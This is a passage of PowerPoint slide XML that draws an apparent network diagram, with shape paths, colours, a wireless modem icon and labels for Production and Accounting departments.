                    <a:cubicBezTo>
                      <a:pt x="8" y="1"/>
                      <a:pt x="12" y="0"/>
                      <a:pt x="18" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="8"/>
                      <a:pt x="24" y="13"/>
                      <a:pt x="24" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="22"/>
                      <a:pt x="29" y="25"/>
                      <a:pt x="30" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="26"/>
                      <a:pt x="31" y="27"/>
                      <a:pt x="33" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="71"/>
                      <a:pt x="85" y="71"/>
                      <a:pt x="85" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="71"/>
                      <a:pt x="88" y="74"/>
                      <a:pt x="95" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="72"/>
                      <a:pt x="100" y="71"/>
                      <a:pt x="104" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="83"/>
                      <a:pt x="109" y="91"/>
                      <a:pt x="109" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="97"/>
                      <a:pt x="104" y="88"/>
                      <a:pt x="102" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="83"/>
                      <a:pt x="97" y="80"/>
                      <a:pt x="93" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="92"/>
                      <a:pt x="93" y="96"/>
                      <a:pt x="94" y="97"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="98"/>
                      <a:pt x="99" y="104"/>
                      <a:pt x="99" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="105"/>
                      <a:pt x="95" y="106"/>
                      <a:pt x="89" y="102"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="97"/>
                      <a:pt x="83" y="92"/>
                      <a:pt x="82" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="82"/>
                      <a:pt x="76" y="78"/>
                      <a:pt x="76" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="77"/>
                      <a:pt x="21" y="31"/>
                      <a:pt x="21" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="31"/>
                      <a:pt x="19" y="29"/>
                      <a:pt x="13" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="30"/>
                      <a:pt x="8" y="32"/>
                      <a:pt x="5" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="21"/>
                      <a:pt x="0" y="13"/>
                      <a:pt x="0" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="8"/>
                      <a:pt x="5" y="17"/>
                      <a:pt x="6" y="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ap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="1B161B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618" name="Freeform 229">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D3DEEE5-CB3B-4F05-9402-CE87AA85D06E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7208892" y="3982733"/>
              <a:ext cx="1906583" cy="511088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>
              <a:prstTxWarp prst="textFadeUp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19" name="Text Box 493">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B4B6F2E-9F53-42FA-BE1C-32E671B61440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2214154" y="2921704"/>
              <a:ext cx="963725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Production</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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Department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20" name="Text Box 498">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34873082-41E1-4B47-ACAF-05F13450E1AD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4795784" y="3213754"/>
              <a:ext cx="96372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Accounting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Department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621" name="Group 542">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2050D03F-C258-4AB3-B1EA-2C7C58C36B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1920" y="4007916"/>
              <a:ext cx="539236" cy="161475"/>
              <a:chOff x="-240" y="-1656"/>
              <a:chExt cx="3137" cy="940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1092" name="Freeform 543">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D436E37-985B-4788-83B5-7EBA38D0271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58" y="-1656"/>
                <a:ext cx="446" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 446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6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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446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1B2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3" name="Freeform 544">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E56D9F9-7F0D-4E12-B451-455F3923ECC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240" y="-1656"/>
                <a:ext cx="3137" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T1" fmla="*/ 54 h 843"/>
                  <a:gd name="T2" fmla="*/ 898 w 3137"/>
                  <a:gd name="T3" fmla="*/ 0 h 843"/>
                  <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T5" fmla="*/ 120 h 843"/>
                  <a:gd name="T6" fmla="*/ 0 w 3137"/>
                  <a:gd name="T7" fmla="*/ 482 h 843"/>
                  <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T9" fmla="*/ 843 h 843"/>
                  <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                  <a:gd name="T11" fmla="*/ 482 h 843"/>
                  <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                  <a:gd name="T13" fmla="*/ 602 h 843"/>
                  <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T15" fmla="*/ 54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7" h="843">
                    <a:moveTo>
                      <a:pt x="2887" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="898" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3137" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2887" y="54"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="0061B2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4" name="Freeform 545">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB33608-B9F7-432E-94FC-BE9F8866FC4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240" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 97 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 458 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 361 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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1B2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5" name="Freeform 546">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BFE25C1-D3C9-4CAC-A545-9E9819972EC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48" y="-1174"/>
                <a:ext cx="449" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 449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9" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449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1B2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6" name="Freeform 547">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C178D153-AD9B-4DDB-AB4B-6C0A5C707C5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104" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 458 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 97 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344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458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="0061B2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pic>
          <p:nvPicPr>
            <p:cNvPr id="622" name="Picture 3" descr="Y:\CEH v7 - Haja\Haja Premium Icons\Wireless_Modem.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38C24B20-0CE7-4A6F-ADAB-11E2217B52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326904" y="3751619"/>
              <a:ext cx="541448" cy="54144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23" name="Freeform 1310">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DAF25D3-8F34-4F19-AA65-924BA280B3DB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3121219" y="3231236"/>
              <a:ext cx="1522896" cy="410353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CACACA"/>
            </a:solidFill>
            <a:ln w="38100" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="0070C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25400" dir="54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24" name="Line 1706">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEEA843D-6725-4369-93BC-5350D9816A90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3233807" y="3176423"/>
              <a:ext cx="0" cy="2340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25" name="Line 1707">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7E6EC63-30C3-47DD-A365-0E9B0D2066BA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3568607" y="3075687"/>
              <a:ext cx="0" cy="2340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626" name="Group 1688">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18028742-7DF0-4CFE-9668-B0ACB31088D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536016" y="3041614"/>
              <a:ext cx="220732" cy="188140"/>
              <a:chOff x="4876" y="-3681"/>
              <a:chExt cx="865" cy="735"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1084" name="Freeform 1689">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87CC4D70-8AB8-43C1-849B-8C148068FFD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6" y="-3537"/>
                <a:ext cx="205" cy="506"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 87"/>
                  <a:gd name="T1" fmla="*/ 9 h 214"/>
                  <a:gd name="T2" fmla="*/ 14 w 87"/>
                  <a:gd name="T3" fmla="*/ 190 h 214"/>
                  <a:gd name="T4" fmla="*/ 69 w 87"/>
                  <a:gd name="T5" fmla="*/ 197 h 214"/>
                  <a:gd name="T6" fmla="*/ 75 w 87"/>
                  <a:gd name="T7" fmla="*/ 4 h 214"/>
                  <a:gd name="T8" fmla="*/ 43 w 87"/>
                  <a:gd name="T9" fmla="*/ 9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214">
                    <a:moveTo>
                      <a:pt x="43" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="17"/>
                      <a:pt x="0" y="171"/>
                      <a:pt x="14" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="209"/>
                      <a:pt x="49" y="214"/>
                      <a:pt x="69" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="182"/>
                      <a:pt x="87" y="16"/>
                      <a:pt x="75" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="4"/>
                      <a:pt x="58" y="0"/>
                      <a:pt x="43" y="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5" name="Freeform 1690">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A44C9880-6A93-4D1E-8EF3-EA0A3E28A4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54" y="-3681"/>
                <a:ext cx="630" cy="654"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 267"/>
                  <a:gd name="T1" fmla="*/ 8 h 277"/>
                  <a:gd name="T2" fmla="*/ 14 w 267"/>
                  <a:gd name="T3" fmla="*/ 206 h 277"/>
                  <a:gd name="T4" fmla="*/ 247 w 267"/>
                  <a:gd name="T5" fmla="*/ 268 h 277"/>
                  <a:gd name="T6" fmla="*/ 247 w 267"/>
                  <a:gd name="T7" fmla="*/ 70 h 277"/>
                  <a:gd name="T8" fmla="*/ 14 w 267"/>
                  <a:gd name="T9" fmla="*/ 8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7" h="277">
                    <a:moveTo>
                      <a:pt x="14" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="16"/>
                      <a:pt x="1" y="187"/>
                      <a:pt x="14" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="225"/>
                      <a:pt x="234" y="277"/>
                      <a:pt x="247" y="268"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="259" y="260"/>
                      <a:pt x="267" y="108"/>
                      <a:pt x="247" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="240" y="56"/>
                      <a:pt x="28" y="0"/>
                      <a:pt x="14" y="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6" name="Freeform 1691">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB3A0B19-95CE-4952-AB8A-CDAF91188FA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17" y="-3620"/>
                <a:ext cx="489" cy="527"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 489"/>
                  <a:gd name="T1" fmla="*/ 0 h 527"/>
                  <a:gd name="T2" fmla="*/ 0 w 489"/>
                  <a:gd name="T3" fmla="*/ 397 h 527"/>
                  <a:gd name="T4" fmla="*/ 489 w 489"/>
                  <a:gd name="T5" fmla="*/ 527 h 527"/>
                  <a:gd name="T6" fmla="*/ 489 w 489"/>
                  <a:gd name="T7" fmla="*/ 130 h 527"/>
                  <a:gd name="T8" fmla="*/ 0 w 489"/>
                  <a:gd name="T9" fmla="*/ 0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9" h="527">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="527"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="13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69A2E1"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="69A2E1">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr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7" name="Freeform 1692">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBE3E242-CB59-49E9-A348-36DF6606276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87" y="-3681"/>
                <a:ext cx="640" cy="172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 100 w 271"/>
                  <a:gd name="T1" fmla="*/ 14 h 73"/>
                  <a:gd name="T2" fmla="*/ 41 w 271"/>
                  <a:gd name="T3" fmla="*/ 4 h 73"/>
                  <a:gd name="T4" fmla="*/ 0 w 271"/>
                  <a:gd name="T5" fmla="*/ 8 h 73"/>
                  <a:gd name="T6" fmla="*/ 233 w 271"/>
                  <a:gd name="T7" fmla="*/ 70 h 73"/>
                  <a:gd name="T8" fmla="*/ 265 w 271"/>
                  <a:gd name="T9" fmla="*/ 65 h 73"/>
                  <a:gd name="T10" fmla="*/ 100 w 271"/>
                  <a:gd name="T11" fmla="*/ 1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1" h="73">
                    <a:moveTo>
                      <a:pt x="100" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="9"/>
                      <a:pt x="48" y="4"/>
                      <a:pt x="41" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="4"/>
                      <a:pt x="7" y="2"/>
                      <a:pt x="0" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="222" y="60"/>
                      <a:pt x="233" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="237" y="73"/>
                      <a:pt x="271" y="69"/>
                      <a:pt x="265" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="257" y="59"/>
                      <a:pt x="161" y="29"/>
                      <a:pt x="100" y="1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8" name="Freeform 1693">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{501E6FC7-32C6-49D1-AB05-C1CE9C0198B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76" y="-3154"/>
                <a:ext cx="660" cy="175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 660"/>
                  <a:gd name="T1" fmla="*/ 52 h 175"/>
                  <a:gd name="T2" fmla="*/ 208 w 660"/>
                  <a:gd name="T3" fmla="*/ 0 h 175"/>
                  <a:gd name="T4" fmla="*/ 660 w 660"/>
                  <a:gd name="T5" fmla="*/ 120 h 175"/>
                  <a:gd name="T6" fmla="*/ 452 w 660"/>
                  <a:gd name="T7" fmla="*/ 175 h 175"/>
                  <a:gd name="T8" fmla="*/ 0 w 660"/>
                  <a:gd name="T9" fmla="*/ 52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0" h="175">
                    <a:moveTo>
                      <a:pt x="0" y="52"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="208" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="660" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5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9" name="Freeform 1694">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A028FEC-9705-4886-A6F6-1AFB2D017E9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28" y="-3034"/>
                <a:ext cx="198" cy="88"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 198"/>
                  <a:gd name="T1" fmla="*/ 55 h 88"/>
                  <a:gd name="T2" fmla="*/ 0 w 198"/>
                  <a:gd name="T3" fmla="*/ 88 h 88"/>
                  <a:gd name="T4" fmla="*/ 198 w 198"/>
                  <a:gd name="T5" fmla="*/ 36 h 88"/>
                  <a:gd name="T6" fmla="*/ 198 w 198"/>
                  <a:gd name="T7" fmla="*/ 0 h 88"/>
                  <a:gd name="T8" fmla="*/ 0 w 198"/>
                  <a:gd name="T9" fmla="*/ 5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88">
                    <a:moveTo>
                      <a:pt x="0" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5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0" name="Freeform 1695">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52E557B1-FC53-4177-ABF0-08AA8D8C369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76" y="-3102"/>
                <a:ext cx="452" cy="156"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 452 w 452"/>
                  <a:gd name="T1" fmla="*/ 156 h 156"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 35 h 156"/>
                  <a:gd name="T4" fmla="*/ 0 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 156"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 123 h 156"/>
                  <a:gd name="T8" fmla="*/ 452 w 452"/>
                  <a:gd name="T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2" h="156">
                    <a:moveTo>
                      <a:pt x="452" y="156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452" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="15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1" name="Freeform 1696">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2DD67AC-A11F-4AF9-BAE5-CB36414E7B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38" y="-3140"/>
                <a:ext cx="517" cy="139"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 517"/>
                  <a:gd name="T1" fmla="*/ 38 h 139"/>
                  <a:gd name="T2" fmla="*/ 383 w 517"/>
                  <a:gd name="T3" fmla="*/ 139 h 139"/>
                  <a:gd name="T4" fmla="*/ 517 w 517"/>
                  <a:gd name="T5" fmla="*/ 104 h 139"/>
                  <a:gd name="T6" fmla="*/ 135 w 517"/>
                  <a:gd name="T7" fmla="*/ 0 h 139"/>
                  <a:gd name="T8" fmla="*/ 0 w 517"/>
                  <a:gd name="T9" fmla="*/ 3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7" h="139">
                    <a:moveTo>
                      <a:pt x="0" y="38"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="383" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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627" name="Group 1697">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22AD9A5D-9440-4182-A62D-81C4F457985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199734" y="3137906"/>
              <a:ext cx="220732" cy="188140"/>
              <a:chOff x="4876" y="-3681"/>
              <a:chExt cx="865" cy="735"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1076" name="Freeform 1698">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{680AFB5F-2833-4E84-91B6-49294009355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6" y="-3537"/>
                <a:ext cx="205" cy="506"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 87"/>
                  <a:gd name="T1" fmla="*/ 9 h 214"/>
                  <a:gd name="T2" fmla="*/ 14 w 87"/>
                  <a:gd name="T3" fmla="*/ 190 h 214"/>
                  <a:gd name="T4" fmla="*/ 69 w 87"/>
                  <a:gd name="T5" fmla="*/ 197 h 214"/>
                  <a:gd name="T6" fmla="*/ 75 w 87"/>
                  <a:gd name="T7" fmla="*/ 4 h 214"/>
                  <a:gd name="T8" fmla="*/ 43 w 87"/>
                  <a:gd name="T9" fmla="*/ 9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214">
                    <a:moveTo>
                      <a:pt x="43" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="17"/>
                      <a:pt x="0" y="171"/>
                      <a:pt x="14" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="209"/>
                      <a:pt x="49" y="214"/>
                      <a:pt x="69" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="182"/>
                      <a:pt x="87" y="16"/>
                      <a:pt x="75" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="4"/>
                      <a:pt x="58" y="0"/>
                      <a:pt x="43" y="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7" name="Freeform 1699">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD9FBE0F-027D-4935-8012-6C424C32F52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54" y="-3681"/>
                <a:ext cx="630" cy="654"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 267"/>
                  <a:gd name="T1" fmla="*/ 8 h 277"/>
                  <a:gd name="T2" fmla="*/ 14 w 267"/>
                  <a:gd name="T3" fmla="*/ 206 h 277"/>
                  <a:gd name="T4" fmla="*/ 247 w 267"/>
                  <a:gd name="T5" fmla="*/ 268 h 277"/>
                  <a:gd name="T6" fmla="*/ 247 w 267"/>
                  <a:gd name="T7" fmla="*/ 70 h 277"/>
                  <a:gd name="T8" fmla="*/ 14 w 267"/>
                  <a:gd name="T9" fmla="*/ 8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7" h="277">
                    <a:moveTo>
                      <a:pt x="14" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="16"/>
                      <a:pt x="1" y="187"/>
                      <a:pt x="14" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="225"/>
